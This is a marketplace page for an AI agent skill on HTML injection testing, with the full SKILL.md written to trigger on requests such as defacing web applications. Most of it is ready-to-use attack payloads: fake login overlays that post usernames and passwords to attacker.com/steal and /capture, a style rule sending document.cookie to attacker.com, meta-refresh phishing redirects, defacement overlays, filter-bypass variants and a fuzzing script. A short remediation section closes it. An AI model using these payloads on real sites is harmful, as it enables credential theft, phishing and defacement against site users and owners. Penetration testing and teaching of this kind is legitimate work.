How do I install HTML Injection Testing?

Install HTML Injection Testing with a single command: npx mdskills install sickn33/html-injection-testing. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support HTML Injection Testing?

HTML Injection Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

HTML Injection Testing

Name: HTML Injection Testing: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". It provides comprehensive HTML injection attack techniques and testing methodologies.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/html-injection-testing

Fork & Edit

Skill Advisor8.0

Comprehensive security testing guide with detailed techniques, payloads, and prevention methods

+Provides extensive phase-by-phase methodology with actionable payloads and examples
+Includes clear remediation guidance and secure coding practices across multiple languages
+Covers advanced techniques, bypass methods, and automated testing approaches
-Requests shell execution permission unnecessarily for web-based testing tasks

SKILL.md

Edit in Browser

1---
2name: HTML Injection Testing
3description: This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". It provides comprehensive HTML injection attack techniques and testing methodologies.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# HTML Injection Testing
10 
11## Purpose
12 
13Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.
14 
15## Prerequisites
16 
17### Required Tools
18- Web browser with developer tools
19- Burp Suite or OWASP ZAP
20- Tamper Data or similar proxy
21- cURL for testing payloads
22 
23### Required Knowledge
24- HTML fundamentals
25- HTTP request/response structure
26- Web application input handling
27- Difference between HTML injection and XSS
28 
29## Outputs and Deliverables
30 
311. **Vulnerability Report** - Identified injection points
322. **Exploitation Proof** - Demonstrated content manipulation
333. **Impact Assessment** - Potential phishing and defacement risks
344. **Remediation Guidance** - Input validation recommendations
35 
36## Core Workflow
37 
38### Phase 1: Understanding HTML Injection
39 
40HTML injection occurs when user input is reflected in web pages without proper sanitization:
41 
42```html
43<!-- Vulnerable code example -->
44<div>
45    Welcome, <?php echo $_GET['name']; ?>
46</div>
47 
48<!-- Attack input -->
49?name=<h1>Injected Content</h1>
50 
51<!-- Rendered output -->
52<div>
53    Welcome, <h1>Injected Content</h1>
54</div>
55```
56 
57Key differences from XSS:
58- HTML injection: Only HTML tags are rendered
59- XSS: JavaScript code is executed
60- HTML injection is often stepping stone to XSS
61 
62Attack goals:
63- Modify website appearance (defacement)
64- Create fake login forms (phishing)
65- Inject malicious links
66- Display misleading content
67 
68### Phase 2: Identifying Injection Points
69 
70Map application for potential injection surfaces:
71 
72```
731. Search bars and search results
742. Comment sections
753. User profile fields
764. Contact forms and feedback
775. Registration forms
786. URL parameters reflected on page
797. Error messages
808. Page titles and headers
819. Hidden form fields
8210. Cookie values reflected on page
83```
84 
85Common vulnerable parameters:
86```
87?name=
88?user=
89?search=
90?query=
91?message=
92?title=
93?content=
94?redirect=
95?url=
96?page=
97```
98 
99### Phase 3: Basic HTML Injection Testing
100 
101Test with simple HTML tags:
102 
103```html
104<!-- Basic text formatting -->
105<h1>Test Injection</h1>
106<b>Bold Text</b>
107<i>Italic Text</i>
108<u>Underlined Text</u>
109<font color="red">Red Text</font>
110 
111<!-- Structural elements -->
112<div style="background:red;color:white;padding:10px">Injected DIV</div>
113<p>Injected paragraph</p>
114<br><br><br>Line breaks
115 
116<!-- Links -->
117<a href="http://attacker.com">Click Here</a>
118<a href="http://attacker.com">Legitimate Link</a>
119 
120<!-- Images -->
121<img src="http://attacker.com/image.png">
122<img src="x" onerror="alert(1)">  <!-- XSS attempt -->
123```
124 
125Testing workflow:
126```bash
127# Test basic injection
128curl "http://target.com/search?q=<h1>Test</h1>"
129 
130# Check if HTML renders in response
131curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"
132 
133# Test in URL-encoded form
134curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"
135```
136 
137### Phase 4: Types of HTML Injection
138 
139#### Stored HTML Injection
140 
141Payload persists in database:
142 
143```html
144<!-- Profile bio injection -->
145Name: John Doe
146Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
147     <h1>Site Under Maintenance</h1>
148     <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
149     </div>
150 
151<!-- Comment injection -->
152Great article!
153<form action="http://attacker.com/steal" method="POST">
154    <input name="username" placeholder="Session expired. Enter username:">
155    <input name="password" type="password" placeholder="Password:">
156    <input type="submit" value="Login">
157</form>
158```
159 
160#### Reflected GET Injection
161 
162Payload in URL parameters:
163 
164```html
165<!-- URL injection -->
166http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">
167 
168<!-- Search result injection -->
169http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>
170```
171 
172#### Reflected POST Injection
173 
174Payload in POST data:
175 
176```bash
177# POST injection test
178curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
179     http://target.com/submit
180 
181# Form field injection
182curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
183     http://target.com/register
184```
185 
186#### URL-Based Injection
187 
188Inject into displayed URLs:
189 
190```html
191<!-- If URL is displayed on page -->
192http://target.com/page/<h1>Injected</h1>
193 
194<!-- Path-based injection -->
195http://target.com/users/<img src=x>/profile
196```
197 
198### Phase 5: Phishing Attack Construction
199 
200Create convincing phishing forms:
201 
202```html
203<!-- Fake login form overlay -->
204<div style="position:fixed;top:0;left:0;width:100%;height:100%;
205            background:white;z-index:9999;padding:50px;">
206    <h2>Session Expired</h2>
207    <p>Your session has expired. Please log in again.</p>
208    <form action="http://attacker.com/capture" method="POST">
209        <label>Username:</label><br>
210        <input type="text" name="username" style="width:200px;"><br><br>
211        <label>Password:</label><br>
212        <input type="password" name="password" style="width:200px;"><br><br>
213        <input type="submit" value="Login">
214    </form>
215</div>
216 
217<!-- Hidden credential stealer -->
218<style>
219    input { background: url('http://attacker.com/log?data=') }
220</style>
221<form action="http://attacker.com/steal" method="POST">
222    <input name="user" placeholder="Verify your username">
223    <input name="pass" type="password" placeholder="Verify your password">
224    <button>Verify</button>
225</form>
226```
227 
228URL-encoded phishing link:
229```
230http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E
231```
232 
233### Phase 6: Defacement Payloads
234 
235Website appearance manipulation:
236 
237```html
238<!-- Full page overlay -->
239<div style="position:fixed;top:0;left:0;width:100%;height:100%;
240            background:#000;color:#0f0;z-index:9999;
241            display:flex;justify-content:center;align-items:center;">
242    <h1>HACKED BY SECURITY TESTER</h1>
243</div>
244 
245<!-- Content replacement -->
246<style>body{display:none}</style>
247<body style="display:block !important">
248    <h1>This site has been compromised</h1>
249</body>
250 
251<!-- Image injection -->
252<img src="http://attacker.com/defaced.jpg" 
253     style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999">
254 
255<!-- Marquee injection (visible movement) -->
256<marquee behavior="alternate" style="font-size:50px;color:red;">
257    SECURITY VULNERABILITY DETECTED
258</marquee>
259```
260 
261### Phase 7: Advanced Injection Techniques
262 
263#### CSS Injection
264 
265```html
266<!-- Style injection -->
267<style>
268    body { background: url('http://attacker.com/track?cookie='+document.cookie) }
269    .content { display: none }
270    .fake-content { display: block }
271</style>
272 
273<!-- Inline style injection -->
274<div style="background:url('http://attacker.com/log')">Content</div>
275```
276 
277#### Meta Tag Injection
278 
279```html
280<!-- Redirect via meta refresh -->
281<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">
282 
283<!-- CSP bypass attempt -->
284<meta http-equiv="Content-Security-Policy" content="default-src *">
285```
286 
287#### Form Action Override
288 
289```html
290<!-- Hijack existing form -->
291<form action="http://attacker.com/steal">
292 
293<!-- If form already exists, add input -->
294<input type="hidden" name="extra" value="data">
295</form>
296```
297 
298#### iframe Injection
299 
300```html
301<!-- Embed external content -->
302<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>
303 
304<!-- Invisible tracking iframe -->
305<iframe src="http://attacker.com/track" style="display:none"></iframe>
306```
307 
308### Phase 8: Bypass Techniques
309 
310Evade basic filters:
311 
312```html
313<!-- Case variations -->
314<H1>Test</H1>
315<ScRiPt>alert(1)</ScRiPt>
316 
317<!-- Encoding variations -->
318&#60;h1&#62;Encoded&#60;/h1&#62;
319%3Ch1%3EURL%20Encoded%3C%2Fh1%3E
320 
321<!-- Tag splitting -->
322<h
3231>Split Tag</h1>
324 
325<!-- Null bytes -->
326<h1%00>Null Byte</h1>
327 
328<!-- Double encoding -->
329%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E
330 
331<!-- Unicode encoding -->
332\u003ch1\u003eUnicode\u003c/h1\u003e
333 
334<!-- Attribute-based -->
335<div onmouseover="alert(1)">Hover me</div>
336<img src=x onerror=alert(1)>
337```
338 
339### Phase 9: Automated Testing
340 
341#### Using Burp Suite
342 
343```
3441. Capture request with potential injection point
3452. Send to Intruder
3463. Mark parameter value as payload position
3474. Load HTML injection wordlist
3485. Start attack
3496. Filter responses for rendered HTML
3507. Manually verify successful injections
351```
352 
353#### Using OWASP ZAP
354 
355```
3561. Spider the target application
3572. Active Scan with HTML injection rules
3583. Review Alerts for injection findings
3594. Validate findings manually
360```
361 
362#### Custom Fuzzing Script
363 
364```python
365#!/usr/bin/env python3
366import requests
367import urllib.parse
368 
369target = "http://target.com/search"
370param = "q"
371 
372payloads = [
373    "<h1>Test</h1>",
374    "<b>Bold</b>",
375    "<script>alert(1)</script>",
376    "<img src=x onerror=alert(1)>",
377    "<a href='http://evil.com'>Click</a>",
378    "<div style='color:red'>Styled</div>",
379    "<marquee>Moving</marquee>",
380    "<iframe src='http://evil.com'></iframe>",
381]
382 
383for payload in payloads:
384    encoded = urllib.parse.quote(payload)
385    url = f"{target}?{param}={encoded}"
386    
387    try:
388        response = requests.get(url, timeout=5)
389        if payload.lower() in response.text.lower():
390            print(f"[+] Possible injection: {payload}")
391        elif "<h1>" in response.text or "<b>" in response.text:
392            print(f"[?] Partial reflection: {payload}")
393    except Exception as e:
394        print(f"[-] Error: {e}")
395```
396 
397### Phase 10: Prevention and Remediation
398 
399Secure coding practices:
400 
401```php
402// PHP: Escape output
403echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
404 
405// PHP: Strip tags
406echo strip_tags($user_input);
407 
408// PHP: Allow specific tags only
409echo strip_tags($user_input, '<p><b><i>');
410```
411 
412```python
413# Python: HTML escape
414from html import escape
415safe_output = escape(user_input)
416 
417# Python Flask: Auto-escaping
418{{ user_input }}  # Jinja2 escapes by default
419{{ user_input | safe }}  # Marks as safe (dangerous!)
420```
421 
422```javascript
423// JavaScript: Text content (safe)
424element.textContent = userInput;
425 
426// JavaScript: innerHTML (dangerous!)
427element.innerHTML = userInput;  // Vulnerable!
428 
429// JavaScript: Sanitize
430const clean = DOMPurify.sanitize(userInput);
431element.innerHTML = clean;
432```
433 
434Server-side protections:
435- Input validation (whitelist allowed characters)
436- Output encoding (context-aware escaping)
437- Content Security Policy (CSP) headers
438- Web Application Firewall (WAF) rules
439 
440## Quick Reference
441 
442### Common Test Payloads
443 
444| Payload | Purpose |
445|---------|---------|
446| `<h1>Test</h1>` | Basic rendering test |
447| `<b>Bold</b>` | Simple formatting |
448| `<a href="evil.com">Link</a>` | Link injection |
449| `<img src=x>` | Image tag test |
450| `<div style="color:red">` | Style injection |
451| `<form action="evil.com">` | Form hijacking |
452 
453### Injection Contexts
454 
455| Context | Test Approach |
456|---------|---------------|
457| URL parameter | `?param=<h1>test</h1>` |
458| Form field | POST with HTML payload |
459| Cookie value | Inject via document.cookie |
460| HTTP header | Inject in Referer/User-Agent |
461| File upload | HTML file with malicious content |
462 
463### Encoding Types
464 
465| Type | Example |
466|------|---------|
467| URL encoding | `%3Ch1%3E` = `<h1>` |
468| HTML entities | `&#60;h1&#62;` = `<h1>` |
469| Double encoding | `%253C` = `<` |
470| Unicode | `\u003c` = `<` |
471 
472## Constraints and Limitations
473 
474### Attack Limitations
475- Modern browsers may sanitize some injections
476- CSP can prevent inline styles and scripts
477- WAFs may block common payloads
478- Some applications escape output properly
479 
480### Testing Considerations
481- Distinguish between HTML injection and XSS
482- Verify visual impact in browser
483- Test in multiple browsers
484- Check for stored vs reflected
485 
486### Severity Assessment
487- Lower severity than XSS (no script execution)
488- Higher impact when combined with phishing
489- Consider defacement/reputation damage
490- Evaluate credential theft potential
491 
492## Troubleshooting
493 
494| Issue | Solutions |
495|-------|-----------|
496| HTML not rendering | Check if output HTML-encoded; try encoding variations; verify HTML context |
497| Payload stripped | Use encoding variations; try tag splitting; test null bytes; nested tags |
498| XSS not working (HTML only) | JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects |
499

Full transparency — inspect the skill content before installing.